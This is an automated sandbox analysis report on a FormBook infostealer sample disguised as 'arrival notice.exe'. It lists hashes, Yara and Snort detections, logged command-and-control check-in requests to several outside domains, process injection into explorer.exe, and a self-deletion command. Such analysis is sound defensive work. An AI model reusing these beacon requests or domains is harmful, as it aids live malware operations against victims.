                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                  Static File Info

                                                  General

                                                  File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit): 7.433485623086771
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name: arrival notice.exe
                                                  File size: 677376
                                                  MD5: 692c22c9579ce47100a87e90f911b202
                                                  SHA1: 29189325967d4716883edabb4c03a5a30d836896
                                                  SHA256: 3f383c683795d277510e0fb4c806ae17bfb33dd6ff875b66c159068e58c28818
                                                  SHA512: 98c6759ef92a350f570dd74b2c53d0307d1c8cf0f4b875ba5d2bb13f11e4bd39ef329b2131f45a18f7d48fdd24c2ab3c65370d71efe9f6975d4b3a4428419887
                                                  SSDEEP: 12288:C/WHCM2K4CiI/yzQs2TaIpIFVEclUDbZ9mbHxbUVO/vCI:Ct3C3MIpIFVEj/cHxbUV8qI
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Aa..............0......n......2.... ... ....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash: f1f0f4d0eecccc71

                                                  Static PE Info

                                                  General

                                                  Entrypoint: 0x4a0532
                                                  Entrypoint Section: .text
                                                  Digitally signed: false
                                                  Imagebase: 0x400000
                                                  Subsystem: windows gui
                                                  Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp: 0x61418E12 [Wed Sep 15 06:09:22 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version: v4.0.30319
                                                  OS Version Major: 4
                                                  OS Version Minor: 0
                                                  File Version Major: 4
                                                  File Version Minor: 0
                                                  Subsystem Version Major: 4
                                                  Subsystem Version Minor: 0
                                                  Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  Name                                  Virtual Address  Virtual Size  Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT          0xa04e0          0x4f          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa2000          0x6b90        .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0xaa000          0xc           .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                  Sections

                                                  Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                  .text   0x2000           0x9e538       0x9e600   False     0.816068653808   data       7.50720151133    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc   0xa2000          0x6b90        0x6c00    False     0.442672164352   data       5.09389272572    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc  0xaa000          0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  Name           RVA      Size    Type  (Language and Country columns are empty)
                                                  RT_ICON        0xa2200  0x668   data
                                                  RT_ICON        0xa2878  0x2e8   dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                  RT_ICON        0xa2b70  0x128   GLS_BINARY_LSB_FIRST
                                                  RT_ICON        0xa2ca8  0xea8   data
                                                  RT_ICON        0xa3b60  0x8a8   dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                  RT_ICON        0xa4418  0x568   GLS_BINARY_LSB_FIRST
                                                  RT_ICON        0xa4990  0x25a8  data
                                                  RT_ICON        0xa6f48  0x10a8  data
                                                  RT_ICON        0xa8000  0x468   GLS_BINARY_LSB_FIRST
                                                  RT_GROUP_ICON  0xa8478  0x84    data
                                                  RT_VERSION     0xa850c  0x484   data
                                                  RT_MANIFEST    0xa89a0  0x1ea   XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                  Imports

                                                  DLL          Import
                                                  mscoree.dll  _CorExeMain

                                                  Version Infos

                                                  Description       Data
                                                  Translation       0x0000 0x04b0
                                                  LegalCopyright    Copyright 2008 - 2010
                                                  Assembly Version  1.3.0.0
                                                  InternalName      IsolatedStora.exe
                                                  FileVersion       1.3.0.0
                                                  CompanyName       WHC
                                                  LegalTrademarks
                                                  Comments          A little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                  ProductName       RYL Character Tool - RoW EU version
                                                  ProductVersion    1.3.0.0
                                                  FileDescription   RYL Character Tool - RoW EU version
                                                  OriginalFilename  IsolatedStora.exe

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
                                                  09/15/21-09:24:30.204516  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49819        80         192.168.2.6  217.160.0.150
                                                  09/15/21-09:24:30.204516  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49819        80         192.168.2.6  217.160.0.150
                                                  09/15/21-09:24:30.204516  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49819        80         192.168.2.6  217.160.0.150

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp  Source Port  Dest Port  Source IP  Dest IP

                                                  UDP Packets

                                                  Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                  Sep 15, 2021 09:23:32.999929905 CEST5406453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:33.054893017 CEST53540648.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:38.142790079 CEST5281153192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:38.181746006 CEST53528118.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:38.906277895 CEST5529953192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:38.949270010 CEST53552998.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:23:46.572726965 CEST6374553192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:23:46.600931883 CEST53637458.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:02.476913929 CEST5005553192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:02.538595915 CEST53500558.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:15.846744061 CEST6137453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:15.922352076 CEST53613748.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:20.934240103 CEST5033953192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:20.973491907 CEST53503398.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:24.779668093 CEST6330753192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:24.812320948 CEST53633078.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:26.417874098 CEST4969453192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:26.460546017 CEST53496948.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:30.120132923 CEST5498253192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:30.182477951 CEST53549828.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:35.288491964 CEST5001053192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:35.321568966 CEST53500108.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:40.655951977 CEST6371853192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:40.695703983 CEST53637188.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:45.699867010 CEST6211653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:45.739990950 CEST53621168.8.8.8192.168.2.6
                                                  Sep 15, 2021 09:24:50.808604002 CEST6381653192.168.2.68.8.8.8
                                                  Sep 15, 2021 09:24:51.033142090 CEST53638168.8.8.8192.168.2.6

                                                  DNS Queries

                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                  Sep 15, 2021 09:24:15.846744061 CEST | 192.168.2.6 | 8.8.8.8 | 0x2eda | Standard query (0) | www.petrosterzis.com | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:20.934240103 CEST | 192.168.2.6 | 8.8.8.8 | 0xd18d | Standard query (0) | www.ilovecoventry.com | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:30.120132923 CEST | 192.168.2.6 | 8.8.8.8 | 0x204e | Standard query (0) | www.beerenhunger.info | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.288491964 CEST | 192.168.2.6 | 8.8.8.8 | 0xc010 | Standard query (0) | www.singisa4letterword.com | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:40.655951977 CEST | 192.168.2.6 | 8.8.8.8 | 0xed90 | Standard query (0) | www.mybenefits51.com | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:45.699867010 CEST | 192.168.2.6 | 8.8.8.8 | 0x2234 | Standard query (0) | www.aboutacoffee.com | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:50.808604002 CEST | 192.168.2.6 | 8.8.8.8 | 0x1993 | Standard query (0) | www.ifbrick.com | A (IP address) | IN (0x0001)

                                                  DNS Answers

                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                  Sep 15, 2021 09:24:15.922352076 CEST | 8.8.8.8 | 192.168.2.6 | 0x2eda | Server failure (2) | www.petrosterzis.com | none | none | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:20.973491907 CEST | 8.8.8.8 | 192.168.2.6 | 0xd18d | No error (0) | www.ilovecoventry.com | ilovecoventry.com | | CNAME (Canonical name) | IN (0x0001)
                                                  Sep 15, 2021 09:24:20.973491907 CEST | 8.8.8.8 | 192.168.2.6 | 0xd18d | No error (0) | ilovecoventry.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:30.182477951 CEST | 8.8.8.8 | 192.168.2.6 | 0x204e | No error (0) | www.beerenhunger.info | | 217.160.0.150 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST | 8.8.8.8 | 192.168.2.6 | 0xc010 | No error (0) | www.singisa4letterword.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST | 8.8.8.8 | 192.168.2.6 | 0xc010 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST | 8.8.8.8 | 192.168.2.6 | 0xc010 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST | 8.8.8.8 | 192.168.2.6 | 0xc010 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:35.321568966 CEST | 8.8.8.8 | 192.168.2.6 | 0xc010 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:40.695703983 CEST | 8.8.8.8 | 192.168.2.6 | 0xed90 | Name error (3) | www.mybenefits51.com | none | none | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:45.739990950 CEST | 8.8.8.8 | 192.168.2.6 | 0x2234 | No error (0) | www.aboutacoffee.com | | 104.21.85.192 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:45.739990950 CEST | 8.8.8.8 | 192.168.2.6 | 0x2234 | No error (0) | www.aboutacoffee.com | | 172.67.209.141 | A (IP address) | IN (0x0001)
                                                  Sep 15, 2021 09:24:51.033142090 CEST | 8.8.8.8 | 192.168.2.6 | 0x1993 | No error (0) | www.ifbrick.com | | 165.73.84.33 | A (IP address) | IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • www.ilovecoventry.com
                                                  • www.beerenhunger.info
                                                  • www.singisa4letterword.com

                                                  HTTP Packets

                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  0 | 192.168.2.6 | 49814 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Sep 15, 2021 09:24:24.153644085 CEST | 7755 | OUT | GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.ilovecoventry.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 09:24:27.149013996 CEST | 7775 | OUT | GET /n58i/?jrU4NBtp=SuMp/r8m7MLbsAhdx2+vo4RDv4Fspb+bmHugmTCD5o7ZU3vK4HF56dfp1g0HnRS7M8EDPfOdWw==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.ilovecoventry.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  1 | 192.168.2.6 | 49819 | 217.160.0.150 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Sep 15, 2021 09:24:30.204515934 CEST | 7776 | OUT | GET /n58i/?vbOlS=UboLn&jrU4NBtp=T43/QHtHCDAxgurMA2nnAzm7cVxOj31InS0qjlwJ5pTUrF8t/fgh9WgQ4TT9zfTSmLODbJhfnA== HTTP/1.1
                                                  Host: www.beerenhunger.info
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 09:24:30.234213114 CEST | 7777 | IN | HTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Content-Length: 601
                                                  Connection: close
                                                  Date: Wed, 15 Sep 2021 07:24:30 GMT
                                                  Server: Apache
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                  2 | 192.168.2.6 | 49820 | 198.185.159.144 | 80 | C:\Windows\explorer.exe
                                                  Timestamp | kBytes transferred | Direction | Data
                                                  Sep 15, 2021 09:24:35.478707075 CEST | 7778 | OUT | GET /n58i/?jrU4NBtp=kluGknW3JYulth+FZOKNGJWFLrjrg7vx1WPWThgYE53lU0Uyu20JwynqYY4FZ9Ej1j1u7QgdhQ==&vbOlS=UboLn HTTP/1.1
                                                  Host: www.singisa4letterword.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Sep 15, 2021 09:24:35.636576891 CEST | 7779 | IN | HTTP/1.1 400 Bad Request
                                                  Cache-Control: no-cache, must-revalidate
                                                  Content-Length: 77564
                                                  Content-Type: text/html; charset=UTF-8
                                                  Date: Wed, 15 Sep 2021 07:24:35 UTC
                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                  Pragma: no-cache
                                                  Server: Squarespace
                                                  X-Contextid: iBmc1kFd/LhSjXyZH
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                  System Behavior

                                                  General

                                                  Start time: 09:22:39
                                                  Start date: 15/09/2021
                                                  Path: C:\Users\user\Desktop\arrival notice.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: 'C:\Users\user\Desktop\arrival notice.exe'
                                                  Imagebase: 0x220000
                                                  File size: 677376 bytes
                                                  MD5 hash: 692C22C9579CE47100A87E90F911B202
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: .Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.381507015.0000000003639000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.381135293.0000000002641000.00000004.00000001.sdmp, Author: Joe Security
                                                  Reputation: low

                                                  General

                                                  Start time: 09:22:53
                                                  Start date: 15/09/2021
                                                  Path: C:\Users\user\Desktop\arrival notice.exe
                                                  Wow64 process (32bit): true
                                                  Commandline: C:\Users\user\Desktop\arrival notice.exe
                                                  Imagebase: 0xac0000
                                                  File size: 677376 bytes
                                                  MD5 hash: 692C22C9579CE47100A87E90F911B202
                                                  Has elevated privileges: true
                                                  Has administrator privileges: true
                                                  Programmed in: C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.451243764.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.451277179.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:09:22:57
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff6f22f0000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.417306189.000000000F67C000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:09:23:24
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\colorcpl.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                  Imagebase:0xdd0000
                                                  File size:86528 bytes
                                                  MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.616538896.00000000048B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.616603392.00000000048E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:09:23:29
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\arrival notice.exe'
                                                  Imagebase:0x2a0000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:09:23:30
                                                  Start date:15/09/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff61de10000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Disassembly

                                                  Code Analysis

                                                    Executed Functions

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB790
                                                    • GetCurrentThread.KERNEL32 ref: 009DB7CD
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB80A
                                                    • GetCurrentThreadId.KERNEL32 ref: 009DB863
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 1241a1036132083f4829c018d12a6e25c3f2b570cad7de4c66b956b28419a9c4
                                                    • Instruction ID: d345de566b9b60259bc3183e4dd710240f24b3c822b09b25d16c3c159cb2b585
                                                    • Opcode Fuzzy Hash: 1241a1036132083f4829c018d12a6e25c3f2b570cad7de4c66b956b28419a9c4
                                                    • Instruction Fuzzy Hash: 8B5145B4D00649CFDB10CFA9D548BDEBBF4AF48314F24896AE409A7350D7746884CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB790
                                                    • GetCurrentThread.KERNEL32 ref: 009DB7CD
                                                    • GetCurrentProcess.KERNEL32 ref: 009DB80A
                                                    • GetCurrentThreadId.KERNEL32 ref: 009DB863
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 85ec69daa336c60467c39a3588c1a106f024cd5fdc6007884fc5a7668055bbc0
                                                    • Instruction ID: 03bdb1fc95cb531b4569c3e9990f30384cc61a0d72eecd6a58398d2009fa4ca7
                                                    • Opcode Fuzzy Hash: 85ec69daa336c60467c39a3588c1a106f024cd5fdc6007884fc5a7668055bbc0
                                                    • Instruction Fuzzy Hash: 125123B4900649CFDB14CFA9C548BDEBBF4AF88314F24896AE409A7350D7746894CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 009D968E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 7446f0624480420740eb03c8caba090e2926d596a06e7496ccd5a884661819ac
                                                    • Instruction ID: db3c7a946a3b71263b176dcf746bb23127630e585da3d751830f37fc1ce683ea
                                                    • Opcode Fuzzy Hash: 7446f0624480420740eb03c8caba090e2926d596a06e7496ccd5a884661819ac
                                                    • Instruction Fuzzy Hash: 36712470A00B058FD724DF6AD04579AB7F9BF88304F108A2AE48AD7B51EB35E845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DFEAA
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.380781059.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
